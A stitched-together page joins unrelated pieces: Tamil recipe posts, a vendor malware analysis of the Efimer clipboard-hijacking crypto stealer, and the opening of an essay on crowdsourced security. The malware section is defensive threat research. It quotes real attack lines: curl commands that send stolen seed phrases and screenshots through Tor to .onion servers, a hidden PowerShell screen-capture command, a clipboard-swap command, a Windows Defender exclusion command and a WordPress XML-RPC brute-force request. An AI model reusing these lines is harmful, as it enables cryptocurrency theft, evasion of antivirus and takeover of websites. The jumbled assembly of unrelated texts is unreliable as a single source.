Spicy chicken chukka is an authentic South Indian recipe. The word "chukka" refers to a dry dish, where the meat or vegetables are cooked with spice masala coating. This chicken chukka tastes really delicious and is a mouth watering recipe too. It is made with fresh spices like cardamom, cloves, cinnamon, dry red chilli, cumin...

Read More

The post Spicy Chukka Chicken Recipe appeared first on Yummy Tummy.

Chettinad Masala Kuzhambu Recipe

By: Aarthi
19 August 2025 at 02:10

Chettinad masala kuzhambu is a signature Tamilnadu delicacy from the vibrant Chettinad cuisine, which is famous for its intense spice blend and rustic flavours. This gravy is made by cooking brinjal in a rich base of coconutΒ  onion, tomato and fennel seeds which is enhanced by grounded spices. Chettinad Masala Kuzhambu I have been making...

Read More

The post Chettinad Masala Kuzhambu Recipe appeared first on Yummy Tummy.

Classic Nei Appam

Β Nei Appam is one of the most important Neivedhiyams / Prasadams made during Janmashtami,Β  Ganesh Chaturthi,Β  Karthigai,Β  Avani Avittam and lot more poojas or rituals like Ganapathi Homam, Bhagavathi Sevai etc .

Instant version can be made using rice flour,but this is a classic version by soaking and grinding rice along with cardamom, ripe bananas and jaggery.Β  Adding grated coconut or slivered coconut bits gives a nice taste and texture to the appam.Β 

I add a teaspoon of udad dhall while soaking the rice, this gives a nice texture and softness to the Neiappams . By adding the udad dhall , we can avoid the use of cooking soda . Udad dhall automatically gives the appam the softness and fluffy texture.Β 

We can using melted jaggery syrup while grinding the appam batter or if we are using good quality powdered jaggery without dust, then we can add it to the rice while grinding.Β 

Grinding jaggery with rice is an easier way to seamlessly blend the rice and jaggery without lumps .

For Krishna Jayanthi, it is said that if we are unable to makeΒ  elaborate prasadams for Krishnar , we can offerΒ 

Navaneetham (Butter + sugar candy)

Nei appam

Aval PayasamΒ (Poha Kheer)

Thayir Aval / GopalkaalaΒ (Dahi Poha)

Paal / Milk.


Preparation Time : 10min
Soaking Time : 4 hrs
Cooking Time : 30min
Complexity : medium

IngredientsΒ 

1 cup rice (no basmati/fragrant rice)
1 tsp udad dhall
3/4 cup jaggery (use 1 cup if you like it very sweet)
1 ripe banana
2 toΒ  3 cardamoms

Procedure

  • Wash and soak the rice and udad dhall for 3 to 4 hrs
  • Drain the water and add the soaked rice to the blender along with roughly chopped banana and cardamom seeds .
  • Grind it to a fine paste adding water in batches.Β 
  • If using organic jaggery powder ,add the jaggery powder to the blender and grind it to a smooth paste resembling Dosa batter .
  • If you are doubtful about the jaggery,melt it using half cup water and strain it .
  • Use this strained jaggery water for grinding the appam batter.
  • Transfer the batter to a mixing bowl ,add a tsp of grated coconut or slivered coconut bits if you like .
  • Beat it well with a whisk or spoon to incorporate air . The batter will feel light . Rest it for 30 to 40 mins
  • Heat the appam pan , pour ghee into the cavities .
  • Once the ghee has heated up,pour the appam batter into the cavities and cook on medium flame until the underside cooks well.
  • Flip it over gently and let the other side cook until crisp and brown.
  • Take it off from the appam pan and repeat the same steps for the entire batch of batter.Β 
  • Tasty and delicious Nei appam is ready.Β 
  • If you like you could also make Jackfruit Nei appam and Watermelon Nei appamΒ  also .

Pinterest Link - https://pin.it/4r11xefoZ



Scammers mass-mailing the Efimer Trojan to steal crypto

Introduction

In June, we encountered a mass mailing campaign impersonating lawyers from a major company. These emails falsely claimed the recipient’s domain name infringed on the sender’s rights. The messages contained the Efimer malicious script, designed to steal cryptocurrency. This script also includes additional functionality that helps attackers spread it further by compromising WordPress sites and hosting malicious files there, among other techniques.

Report summary:

  • Efimer is spreading through compromised WordPress sites, malicious torrents, and email.
  • It communicates with its command-and-control server via the Tor network.
  • Efimer expands its capabilities through additional scripts. These scripts enable attackers to brute-force passwords for WordPress sites and harvest email addresses for future malicious email campaigns.

Kaspersky products classify this threat with the following detection verdicts:

  • HEUR:Trojan-Dropper.Script.Efimer
  • HEUR:Trojan-Banker.Script.Efimer
  • HEUR:Trojan.Script.Efimer
  • HEUR:Trojan-Spy.Script.Efimer.gen

Technical details

Background

In June, we detected a mass mailing campaign that was distributing identical messages with a malicious archive attached. The archive contained the Efimer stealer, designed to pilfer cryptocurrency. This malware was dubbed β€œEfimer” because the word appeared in a comment at the beginning of its decrypted script. Early versions of this Trojan likely emerged around October 2024, initially spreading via compromised WordPress websites. While attackers continue to use this method, they expanded their distribution in June to include email campaigns.

Part of the script with comments

Part of the script with comments

Email distribution

The emails that users received claimed that lawyers from a large company had reviewed the recipient’s domain and found words or phrases in its name that infringed upon their registered trademarks. The emails threatened legal action but offered to drop the lawsuit if the domain owner changed the domain name. Furthermore, they even expressed willingness to purchase the domain. The specific domain was never mentioned in the email. Instead, the attachment supposedly contained β€œdetails” about the alleged infringement and the proposed buyout amount.

Sample email

Sample email

In a recent phishing attempt, targets received an email with a ZIP attachment named β€œDemand_984175” (MD5: e337c507a4866169a7394d718bc19df9). Inside, recipients found a nested, password-protected archive and an empty file named β€œPASSWORD – 47692”. It’s worth noting the clever obfuscation used for the password file: instead of a standard uppercase β€œS”, the attackers used the Unicode character U+1D5E6. This subtle change was likely implemented to prevent automated tools from easily extracting the password from the filename.

Archive contents

Archive contents

If the user unzips the password-protected archive, they’ll find a malicious file named β€œRequirement.wsf”. Running this file infects their computer with the Efimer Trojan, and they’ll likely see an error message.

Error message

Error message

Here’s how this infection chain typically plays out. When the Requirement.wsf script first runs, it checks for administrator privileges. It does this by attempting to create and write data to a temporary file at C:\\Windows\\System32\\wsf_admin_test.tmp. If the write is successful, the file is then deleted. What happens next depends on the user’s access level:

  • If the script is executed on behalf of a privileged user, it adds the C:\\Users\\Public\\controllerΒ folder to the Windows Defender antivirus exclusions. This folder will then be used to store various files. It also adds to exclusions the full path to the currently running WSF script and the system processes C:\\Windows\\System32\\exe and C:\\Windows\\System32\\cmd.exe. Following this, the script saves two files to the aforementioned path: β€œcontroller.js” (containing the Efimer Trojan) and β€œcontroller.xml”. Finally, it creates a scheduler task in Windows, using the configuration from controller.xml.
  • If the script is run with limited user privileges, it saves only the controller.js file to the same path. It adds a parameter for automatic controller startup to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\controller registry key. The controller is then launched via the WScript utility.

Afterward, the script uses WScript methods to display an error message dialog box and then exits. This is designed to mislead the user, who might be expecting an application or document to open, when in reality, nothing useful occurs.

Efimer Trojan

The controller.js script is a ClipBanker-type Trojan. It’s designed to replace cryptocurrency wallet addresses the user copies to their clipboard with the attacker’s own. On top of that, it can also run external code received directly from its command-and-control server.

The Trojan starts by using WMI to check if Task Manager is running.

If it is, the script exits immediately to avoid detection. However, if Task Manager isn’t running, the script proceeds to install a Tor proxy client on the victim’s computer. The client is used for communication with the C2 server.

The script has several hardcoded URLs to download Tor from. This ensures that even if one URL is blocked, the malware can still retrieve the Tor software from the others. The sample we analyzed contained the following URLs:

https://inpama[.]com/wp-content/plugins/XZorder/ntdlg.dat
https://www.eskisehirdenakliyat[.]com/wp-content/plugins/XZorder/ntdlg.dat
https://ivarchasv[.]com/wp-content/plugins/XZorder/ntdlg.dat
https://echat365[.]com/wp-content/plugins/XZorder/ntdlg.dat
https://navrangjewels[.]com/wp-content/plugins/XZorder/ntdlg.dat

The file it downloads from one of the URLs (A46913AB31875CF8152C96BD25027B4D) is the Tor proxy service. The Trojan saves it to C:\\Users\\Public\\controller\\ntdlg.exe. If the download fails, the script terminates.

Assuming a successful download, the script launches the file with the help of WScript and then goes dormant for 10 seconds. This pause likely allows the Tor service to establish a connection with the Onion network and initialize itself. Next, the script attempts to read a GUID from C:\\Users\\Public\\controller\\GUID. If the file cannot be found, it generates a new GUID via createGUID() and saves it to the specified path.

The GUID format is always vs1a-<4 random hex characters>, for example, vs1a-1a2b.

The script then tries to load a file named β€œSEED” from C:\\Users\\Public\\controller\\SEED. This file contains mnemonic phrases for cryptocurrency wallets that the script has collected. We’ll delve into how it finds and saves these phrases later in this post. If the SEED file is found, the script sends it to the server and then deletes it. These actions assume that the script might have previously terminated improperly, which would have prevented the mnemonic phrases from being sent to the server. To avoid losing collected data in case of an error, the malware saves them to a file before attempting to transmit them.

At this point, the controller concludes its initialization process and enters its main operation cycle.

The main loop

In each cycle of operation, the controller checks every 500 milliseconds whether Task Manager is running. As before, if it is, the process exits.

If the script doesn’t terminate, it begins to ping the C2 server over the Tor network. To do this, the script sends a request containing a GUID (Globally Unique Identifier) to the server. The server’s response will be a command. To avoid raising suspicion with overly frequent requests while maintaining constant communication, the script uses a timer (the p_timerΒ variable).

As we can see, every 500 milliseconds (half a second), immediately after checking if Task Manager is running, p_timerΒ decrements by 1. When the variable reaches 0 (it’s also zero on the initial run), the timer is reset using the following formula: the PING_INT variable, which is set to 1800, is multiplied by two, and the result is stored in p_timer. This leaves 1800 seconds, or 30 minutes, until the next update. After the timer updates, the PingToOnion function is called, which we discuss next. Many similar malware strains constantly spam the network, hitting their C2 server for commands. The behavior quickly gives them away. A timer allows the script to stay under the radar while maintaining its connection to the server. Making requests only once every half an hour makes them much harder to spot in the overall traffic flow.

The PingToOnion function works hand-in-hand with CheckOnionCMD. In the first one, the script sends a POST request to the C2 using the curl utility, routing the request through a Tor proxy located at localhost:9050 at the address:

http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php

The server’s response is saved to the user’s %TEMP% directory at %TEMP%\cfile.

curl -X POST -d "' + _0x422bc3 + '" --socks5-hostname localhost:9050 ' + PING_URL + ' --max-time 30 -o ' + tempStrings + '\\cfile

After a request is sent to the server, CheckOnionCMD immediately kicks in. Its job is to look for a server response in a file named β€œcfile” located in the %TEMP% directory. If the response contains a GUID command, the malware does nothing. This is likely a PONG response from the server, confirming that the connection to the C2 server is still alive and well. However, if the first line of the response contains an EVAL command, it means all subsequent lines are JavaScript code. This code will then be executed using the eval function.

Regardless of the server’s response, the Trojan then targets the victim’s clipboard data. Its primary goal is to sniff out mnemonic phrases and swap copied cryptocurrency wallet addresses with the attacker’s own wallet addresses.

First, it scans the clipboard for strings that look like mnemonic (seed) phrases.

If it finds any, these phrases are saved to a file named β€œSEED” (similar to the one the Trojan reads at startup). This file is then exfiltrated to the server using the PingToOnion function described above with the action SEED parameter. Once sent, the SEED file is deleted. The script then takes five screenshots (likely to capture the use of mnemonic phrases) and sends them to the server as well.

They are captured with the help of the following PowerShell command:

powershell.exe -NoProfile -WindowStyle Hidden -Command "$scale = 1.25; Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $sw = [System.Windows.Forms.SystemInformation]::VirtualScreen.Width; $sh = [System.Windows.Forms.SystemInformation]::VirtualScreen.Height; $w = [int]($sw * $scale); $h = [int]($sh * $scale); $bmp = New-Object Drawing.Bitmap $w, $h; $g = [Drawing.Graphics]::FromImage($bmp); $g.ScaleTransform($scale, $scale); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size); $bmp.Save(\'' + path.replace(/\\/g, '\\\\') + '\', [Drawing.Imaging.ImageFormat]::Png); ' + '$g.Dispose(); $bmp.Dispose();"

The FileToOnion function handles sending files to the server. It takes two arguments: the file itself (in this case, a screenshot) and the path where it needs to be uploaded.

Screenshots are sent to the following path on the server:

http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/recvf.php

Files are also sent via a curl command:

curl -X POST -F "file=@' + screenshot + '" ' + '-F "MGUID=' + GUID + '" ' + '-F "path=' + path + '" ' + '--socks5-hostname localhost:9050 "' + FILE_URL + '"

After sending the file, the script goes idle for 50 seconds. Then, it starts replacing cryptocurrency wallet addresses. If the clipboard content is only numbers, uppercase and lowercase English letters, and includes at least one letter and one number, the script performs additional checks to determine if it’s a Bitcoin, Ethereum, or Monero wallet. If a matching wallet is found in the clipboard, the script replaces it according to the following logic:

  • Short Bitcoin wallet addresses (starting with β€œ1” or β€œ3” and 32–36 characters long) are replaced with a wallet whose first two characters match those in the original address.
  • For long wallet addresses that start with β€œbc1q” or β€œbc1p” and are between 40 and 64 characters long, the malware finds a substitute address where the last character matches the original.

  • If a wallet address begins with β€œ0x” and is between 40 and 44 characters long, the script replaces it with one of several Ethereum wallets hardcoded into the malware. The goal here is to ensure the first three characters match the original address.

  • For Monero addresses that start with β€œ4” or β€œ8” and are 95 characters long, attackers use a single, predefined address. Similar to other wallet types, the script checks for matching characters between the original and the swapped address. In the case of Monero, only the first character needs to match. This means the malware will only replace Monero wallets that start with β€œ4”.

This clipboard swap is typically executed with the help of the following command:

cmd.exe /c echo|set/p= + new_clipboard_data + |clip

After each swap, the script sends data to the server about both the original wallet and the replacement.

Distribution via compromised WordPress sites

As mentioned above, in addition to email, the Trojan spreads through compromised WordPress sites. Attackers search for poorly secured websites, brute-force their passwords, and then post messages offering to download recently released movies. These posts include a link to a password-protected archive containing a torrent file.

Here's an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/

Here’s an example of such a post on https://lovetahq[.]com/sinners-2025-torent-file/

The torrent file downloads a folder to the device. This folder contains something that looks like a movie in XMPEG format, a β€œreadme !!!.txt” text file, and an executable that masquerades as a media player.
Downloaded files

Downloaded files

To watch a movie in the XMPEG format, the user would seemingly need to launch xmpeg_player.exe. However, this executable is actually another version of the Efimer Trojan installer. Similar to the WSF variant, this EXE installer extracts the Trojan’s main component into the C:\\Users\\Public\\Controller folder, but it’s named β€œntdlg.js”. Along with the Trojan, the installer also extracts the Tor proxy client, named β€œntdlg.exe”. The installer then uses PowerShell to add the script to startup programs and the β€œController” folder to Windows Defender exclusions.

cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Controller\'

The extracted Trojan is almost identical to the one spread via email. However, this version’s code includes spoofed wallets for Tron and Solana, in addition to the Bitcoin, Ethereum, and Monero wallets. Also, the GUID for this version starts with β€œvt05”.

Additional scripts

On some compromised machines, we uncovered several other intriguing scripts communicating with the same .onion domain as the previously mentioned ones. We believe the attackers installed these via an eval command to execute payloads from their C2 server.

WordPress site compromise

Among these additional scripts, we found a file named β€œbtdlg.js” (MD5: 0f5404aa252f28c61b08390d52b7a054). This script is designed to brute-force passwords for WordPress sites.

Once executed, it generates a unique user ID, such as fb01-<4 random hex characters>, and saves it to C:\\Users\\Public\\Controller\\.

The script then initiates multiple processes to launch brute-force attacks against web pages. The code responsible for these attacks is embedded within the same script, prior to the main loop. To trigger this functionality, the script must be executed with the β€œB” parameter. Within its main loop, the script initiates itself by calling the _runBruteProc function with the parameter β€œB”.

After a brute-force attack is completed, the script returns to the main loop. Here, it will continue to spawn new processes until it reaches a hardcoded maximum of 20.

Thus, the script supports two modes – brute-force and the main one, responsible for the initial launch. If the script is launched without any parameters, it immediately enters the main loop. From there, it launches a new instance of itself with the β€œB” parameter, kicking off a brute-force attack.

The script's operation cycle involves both the brute-force code and the handler for its core logic

The script’s operation cycle involves both the brute-force code and the handler for its core logic

The brute-force process starts via the GetWikiWords function: the script retrieves a list of words from Wikipedia. This list is then used to identify new target websites for the brute-force attack. If the script fails to obtain the word list, it waits 30 minutes before retrying.

The script then enters its main operation loop. Every 30 minutes, it initiates a request to the C2 server. This is done with the help of the PingToOnion method, which is consistent with the similarly named methods found in other scripts. It sends a BUID command, transmitting a unique user ID along with brute-force statistics. This includes the total number of domains attacked, and the count of successful and failed attacks.

After this, the script utilizes the GetRandWords function to generate a list of random words sourced from Wikipedia.

Finally, using these Wikipedia-derived random words as search parameters, the script employs the getSeDomains function to search Google and Bing for domains to target with brute-force attacks.

Part of the getSeDomains function

Part of the getSeDomains function

The ObjID function calculates an eight-digit hexadecimal hash, which acts as a unique identifier for a special object (obj_id). In this case, the special object is a file containing brute-force information. This includes a list of users for password guessing, success/failure flags for brute-force attempts, and other script-relevant data. For each distinct domain, this data is saved to a separate file. The script then checks if this identifier has been encountered before. All unique identifiers are stored in a file named β€œUDBXX.dat”. The script searches the file for a new identifier, and if one isn’t found, it’s added. This identifier tracking helps save time by avoiding reprocessing of already known domains.

For every new domain, the script makes a request using the WPTryPost function. This is an XML-RPC function that attempts to create a test post using a potential username and password. The command to create the post looks like this:

<?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><string>1</string></value></param><param><value><string>' + %LOGIN%+ '</string></value></param>' + '<param><value><string>' + %PASSWORD%+ '</string></value></param>' + '<param><value><struct>' + '<member>' + '<name>title</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>description</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_keywords</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '<member>' + '<name>mt_excerpt</name>' + '<value><string>0x1c8c5b6a</string></value>' + '</member>' + '</struct></value></param>' + '<param><value><boolean>1</boolean></value></param>' + '</params>' + '</methodCall>

When the XML-RPC request is answered, whether successfully or not, the WPGetUsers function kicks in to grab users from the domain. This function hits the domain at /wp-json/wp/v2/users, expecting a list of WordPress site users in return.

This list of users, along with the domain and counters tracking the number of users and passwords brute-forced, gets written to the special object file described above. The ID for this file is calculated with the help of ObjID. After processing a page, the script lies dormant for five seconds before moving on to the next one.

Meanwhile, multiple processes are running concurrently on the victim’s computer, all performing brute-force operations. As mentioned before, when the script is launched with the β€œB” argument, it enters an infinite brute-forcing loop, with each process independently handling its targets. At the start of each iteration, there’s a randomly chosen 1–2 second pause. This delay helps stagger the start times of requests, making the activity harder to detect. Following this, the process retrieves a random object file ID for processing from C:\\Users\\Public\\Controller\\objects by calling ObjGetW.

The ObjGetWΒ function snags a random domain object that’s not currently tied up by a brute-force process. Locked files are marked with the LOCK extension. Once a free, random domain is picked for brute-forcing, the lockObjΒ function is called. This changes the file’s extension to LOCK so other processes don’t try to work on it. If all objects are locked, or if the chosen object can’t be locked, the script moves to the next loop iteration and tries again until it finds an available file. If a file is successfully acquired for processing, the script extracts data from it, including the domain, password brute-force counters, and a list of users.

Based on these counter values, the script checks if all combinations have been exhausted or if the maximum number of failed attempts has been exceeded. If the attempts are exhausted, the object is deleted, and the process moves on to a new iteration. If attempts remain, the script tries to authenticate with the help of hardcoded passwords.

When attempting to guess a password for each user, a web page post request is sent via the WPTryPostΒ function. Depending on the outcome of the brute-force attempt, ObjUpd is called to update the status for the current domain and the specific username-password combination.

After the status is updated, the object is unlocked, and the process pauses randomly before continuing the cycle with a new target. This ensures continuous, multi-threaded credential brute-forcing, which is also regulated by the script and logged in a special file. This logging prevents the script from starting over from scratch if it crashes.

Successfully guessed passwords are sent to the C2 with the GOOD command.

Alternative Efimer version

We also discovered another script named β€œassembly.js” (MD5: 100620a913f0e0a538b115dbace78589). While similar in functionality to controller.js and ntdlg.js, it has several significant differences.

Similarly to the first script, this one belongs to the ClipBanker type. Just like its predecessors, this malware variant reads a unique user ID. This time it looks for the ID at C:\\Users\\Public\\assembly\\GUID. If it can’t find or read that ID, it generates a new one. This new ID follows the format M11-XXXX-YYYY, where XXXX and YYYY are random four-digit hexadecimal numbers. Next up, the script checks if it’s running inside a virtual machine environment.

If it detects a VM, it prefixes the GUID string with a β€œV”; otherwise, it uses an β€œR”. Following this, the directory where the GUID is stored (which appears to be the script’s main working directory) is hidden.

After that, a file named β€œlptime” is saved to the same directory. This file stores the current time, minus 21,000 seconds. Once these initial setup steps are complete, the malware enters its main operation loop. The first thing it does is check the time stored in the β€œlptime” file. If the difference between the current time and the time in the file is greater than 21,600 seconds, it starts preparing data to send to the server.

After that, the script attempts to read data from a file named β€œgeip”, which it expects to find at C:\\Users\\Public\\assembly\\geip. This file contains information about the infected device’s country and IP address. If it’s missing, the script retrieves information from https://ipinfo.io/json and saves it. Next, it activates the Tor service, located at C:\\Users\\Public\\assembly\\upsvc.exe.

Afterwards, the script uses the function GetWalletsList to locate cryptocurrency wallets and compile a list of its findings.

It prioritizes scanning of browser extension directories for Google Chrome and Brave, as well as folders for specific cryptocurrency wallet applications whose paths are hardcoded within the script.

The script then reads a file named β€œdata” from C:\\Users\\Public\\assembly. This file typically contains the results of previous searches for mnemonic phrases in the clipboard. Finally, the script sends the data from this file, along with the cryptocurrency wallets it discovered from application folders, to a C2 server at:

http://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion/assembly/route.php

After the script sends the data, it verifies the server’s response with the help of the CheckOnionCMD function, which is similar to the functions found in the other scripts. The server’s response can contain one of the following commands:

  • RPLY returns β€œOK”. This response is only received after cryptocurrency wallets are sent, and indicates that the server has successfully received the data. If the server returns β€œOK”, the old data file is deleted. However, if the transmission fails (no response is received), the file isn’t deleted. This ensures that if the C2 server is temporarily unavailable, the accumulated wallets can still be sent once communication is re-established.
  • EVAL executes a JavaScript script provided in the response.
  • KILL completely removes all of the malware’s components and terminates its operation.

Next, the script scans the clipboard for strings that resemble mnemonic phrases and cryptocurrency wallet addresses.

Any discovered data is then XOR-encrypted using the key $@#LcWQX3$ and saved to a file named β€œdata”. After these steps, the entire cycle repeats.

β€œLiame” email address harvesting script

This script operates as another spy, much like the others we’ve discussed, and shares many similarities. However, its purpose is entirely different. Its primary goal is to collect email addresses from specified websites and send them to the C2 server. The script receives the list of target websites as a command from the C2. Let’s break down its functionality in more detail.

At startup, the script first checks for the presence of the LUID (unique identifier for the current system) in the main working directory, located at C:\\Users\\Public\\Controller\\LUID. If the LUID cannot be found, it creates one via a function similar to those seen in other scripts. In this case, the unique identifier takes the format fl01-<4 random hex characters>.

Next, the checkUpdate() function runs. This function checks for a file at C:\\Users\\Public\\Controller\\update_l.flag. If the file exists, the script waits for 30 seconds, then deletes update_l.flag, and terminates its operation.

Afterwards, the script periodically (every 10 minutes) sends a request to the server to receive commands. It uses a function named PingToOnion, which is similar to the identically named functions in other scripts.

The request includes the following parameters:

  • LIAM: unique identifier
  • action: request type
  • data: data corresponding to the request type

In this section of the code, LIAM string is used as the action, and the data parameter contains the number of collected email addresses along with the script operation statistics.

If the script unexpectedly terminates due to an error, it can send a log in addition to the statistics, where the action parameter will contain LOGS string, and the data parameter will contain the error message.

The request is sent to the following C2 address:

http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php

The server returns a JSON-like structure, which the next function later parses.

The structure dictates the commands the script should execute.

This script supports two primary functions:

  • Get a list of email addresses from domains provided by the server

    The script receives domains and iterates through each one to find hyperlinks and email addresses on the website pages.

    The GetPageLinks function parses the HTML content of a webpage and extracts all links that reside on the same domain as the original page. This function then filters these links, retaining only those that point to HTML/PHP files or files without extensions.

    The PageGetLiameΒ function extracts email addresses from the page’s HTML content. It can process both openly displayed addresses and those encapsulated within mailto linksΒ .

    Following this initial collection, the script revisits all previously gathered links on the C2-provided domains, continuing its hunt for additional email addresses. Finally, the script de-duplicates the entire list of harvested email addresses and saves them for future use.

  • Exfiltrate collected data to the server
    In this scenario, the script anticipates two parameters from the C2 server’s response: pstack and buffer, where:
    • pstack is an array of domains to which subsequent POST requests will be sent;
    • buffer is an array of strings, each containing data in the format of address,subject,message.

    The script randomly selects a domain from pstack and then uploads one of the strings from the buffer parameter to it. This part of the script likely functions as a spam module, designed to fill out forms on target websites. For each successful data submission via a POST request to a specific domain, the script updates its statistics (which we mentioned earlier) with the number of successful transmissions for that domain.

    If an error occurs within this loop, the script catches it and reports it back to the C2 server with the LOGS command.

Throughout the code, you’ll frequently encounter the term β€œLiame”, which is simply β€œEmail” spelled backwards. Similarly, variations like β€œLiama”, β€œLiam”, and β€œLiams” are also present, likely derived from β€œLiame”. This kind of β€œwordplay” in the code is almost certainly an attempt to obscure the malicious intent of its functions. For example, instead of a clearly named β€œPageGetEmail” function, you’d find β€œPageGetLiame”.

Victims

From October 2024 through July 2025, Kaspersky solutions detected the Efimer Trojan impacting 5015 Kaspersky users. The malware exhibited its highest level of activity in Brazil, where attacks affected 1476 users. Other significantly impacted countries include India, Spain, Russia, Italy, and Germany.

TOP 10 countries by the number of users who encountered Efimer (download)

Takeaways

The Efimer Trojan combines a number of serious threats. While its primary goal is to steal and swap cryptocurrency wallets, it can also leverage additional scripts to compromise WordPress sites and distribute spam. This allows it to establish a complete malicious infrastructure and spread to new devices.

Another interesting characteristic of this Trojan is its attempt to propagate among both individual users and corporate environments. In the first case, attackers use torrent files as bait, allegedly to download popular movies; in the other, they send claims about the alleged unauthorized use of words or phrases registered by another company.

It’s important to note that in both scenarios, infection is only possible if the user downloads and launches the malicious file themselves. To protect against these types of threats, we urge users to avoid downloading torrent files from unknown or questionable sources, always verify email senders, and consistently update their antivirus databases.

For website developers and administrators, it’s crucial to implement measures to secure their resources against compromise and malware distribution. This includes regularly updating software, using strong (non-default) passwords and two-factor authentication, and continuously monitoring their sites for signs of a breach.

Indicators of compromise

Hashes of malicious files
39fa36b9bfcf6fd4388eb586e2798d1a β€” Requirement.wsf
5ba59f9e6431017277db39ed5994d363 β€” controller.js
442ab067bf78067f5db5d515897db15c β€” xmpeg_player.exe
16057e720be5f29e5b02061520068101 β€” xmpeg_player.exe
627dc31da795b9ab4b8de8ee58fbf952 β€” ntdlg.js
0f5404aa252f28c61b08390d52b7a054 β€” btdlg.js
eb54c2ff2f62da5d2295ab96eb8d8843 β€” liame.js
100620a913f0e0a538b115dbace78589 β€” assembly.js
b405a61195aa82a37dc1cca0b0e7d6c1 β€” btdlg.js

Hashes of clean files involved in the attack
5d132fb6ec6fac12f01687f2c0375353 β€” ntdlg.exe (Tor)

Websites
hxxps://lovetahq[.]com/sinners-2025-torent-file/
hxxps://lovetahq[.]com/wp-content/uploads/2025/04/movie_39055_xmpg.zip

C2 URLs
hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion
hxxp://he5vnov645txpcv57el2theky2elesn24ebvgwfoewlpftksxp4fnxad[.]onion

Karthigai Vella Adai Recipe – Karthigai Deepam Special

By: Sharmili
21 November 2023 at 03:23

Karthigai Deepam is a highly celebrated festival in Southern India, particularly in Tamil Nadu. It is a time for people to honour Lord Shiva as a divine flame during the Tamil month of Karthigai (November-December). This festival is also known as the Festival of Lights and is a grand affair.

As part of the celebration, people illuminate their homes with lamps to symbolize the triumph of light over darkness and ignorance. It is a beautiful sight that fills everyone’s hearts with hope and inspiration. The day is marked with prayers, rituals, and the lighting of a massive lamp on the hill of Arunachala in Thiruvannamalai, an awe-inspiring sight.

Sweet Karthigai Adai is a delectable treat that adds to the joy of the festival. It is prepared with great care and devotion, using rice, lentils, jaggery, coconut, and cardamom. These adais are a cherished offering during Karthigai Deepam, bringing sweetness and symbolism to the celebration. It is a testament to the love and unity among families and communities.

Enjoy the video of Karthiga Vella Adai. Subscribe for more videos.

Now, let us see how to prepare this recipe.

Karthigai Vella Adai Recipe - Karthigai Deepam Special
Delicious Karthigai Vella Adai.
Servings10 pieces appox
Prep Time10 min(excluding soaking time)
Cook Time20 mins
Ingredients
Instructions
  1. Add rice, toor dal, and chana dal in a bowl. Add enough water and wash it thoroughly 2 to 3 times. Add fresh water and soak rice and dal for 2 to 3 hours.
  2. Once soaked, transfer rice and dal to a mixer jar. Add little water and grind it to a smooth paste.
  3. To the batter, add salt, jaggery, cardamom powder and grind to a smooth batter.
  4. Transfer the batter to a bowl. Add coconut bits and mix all thoroughly. Adjust the batter consistency if required.
  5. Adai is usually made thick. If you want thinner adai, add the water and make it like crispy dosa.
  6. Heat a pan, pour a ladle of batter, and spread it in a circular motion, as shown. Drizzle a spoon of ghee. Let it cook.
  7. Now flip to the other side and drizzle another spoon of ghee. Once cooked again, flip to the first side and cook for a few more minutes till it gets crispier. Now transfer to a plate. Vella adai is ready.
Recipe Notes
  • Soak lentils and rice for at least 2-3 hours.
  • Grind the batter to a smooth paste, and keep it slightly thicker than the dosa batter consistency.
  • Adai can be made immediately after grinding. You need not ferment the batter.
  • If you want to use the remaining batter, refrigerate it for later use. (approx two days)

Delicious Karthigai Vella Adai is ready to serve God as Prashad.

If you found this post useful, I would really love it if you pin it or share it with your Facebook fans, Twitter followers, or Google+ circles today. All it takes is a simple click on the β€œpin it”, β€œlike,” β€œshare,” β€œTweet,” or Google+ buttons below the post. It will keep me motivated. Thank you!

Β 

Why Crowdsourced Security is Devastating to Threat Actors

6 February 2023 at 09:00

Almost every day, my spouse and I have a conversation about spam. Not the canned meat, but the number of unwelcomed emails and text messages we receive. He gets several nefarious text messages a day, while I maybe get one a week. Phishing emails come in waves β€” right now, I’m getting daily warnings that my AV software license is about to expire. Blocking or filtering has limited success and, as often as not, flags wanted rather than unwanted messages.

Our ritual of comparing phishing attempts acts as informal security crowdsourcing. While most of these messages are clearly a poor attempt at social engineering, something realistic seeps in every so often.

So we talk about it. We review basic security practices. Just one wrong click could have a devastating impact on his work network.

We all know that phishing and malicious messages have been effective attack vectors since the earliest days of the internet, and yet users continue to fall victim. Spammers and threat actors know that recipients of these messages will continue to fall for their schemes.

What helps threat actors and hurts the rest of us is the inability to do anything to stop phishing attacks. It’s not just a matter of filtering something to go into the junk folder.

What will make a difference is the ability to take the information about malicious messaging and report it back to communication providers, network administrators and security teams so everyone can work together to eliminate threats.

Crowdsourcing Security is Common

Using crowdsourcing as a way to prevent phishing attacks builds on other popular crowdsourced security methods. Large tech companies have used bug bounties for years, with monetary rewards offered to users who find vulnerabilities in their systems.

The more people who look for something, the greater their chance of finding it. This is the theory that crowdsourcing is based on. Some organizations see crowdsourcing as ongoing penetration testing, and if the rewards are high enough, users will continue to be watchful for potential bugs in the system.

But as we’ve seen repeatedly, what works for security works for the bad guys as well. Threat actors also use crowdsourcing for cyber crime.

β€œCyber crime is just crowdsourced security but without any of the ethical elements. The reward structure mimics the way that cyber crime operates more closely than traditional security testing methods,” explained a blog post from Detectify.

Crowdsourcing Phishing Shows Promise

A study conducted by ETH Zurich found that the exercises used to train users to recognize phishing attempts have the opposite effect β€” rather than becoming resilient, users become more susceptible to falling for nefarious messaging. What does work, the research found, was crowdsourcing through collective phishing detection.

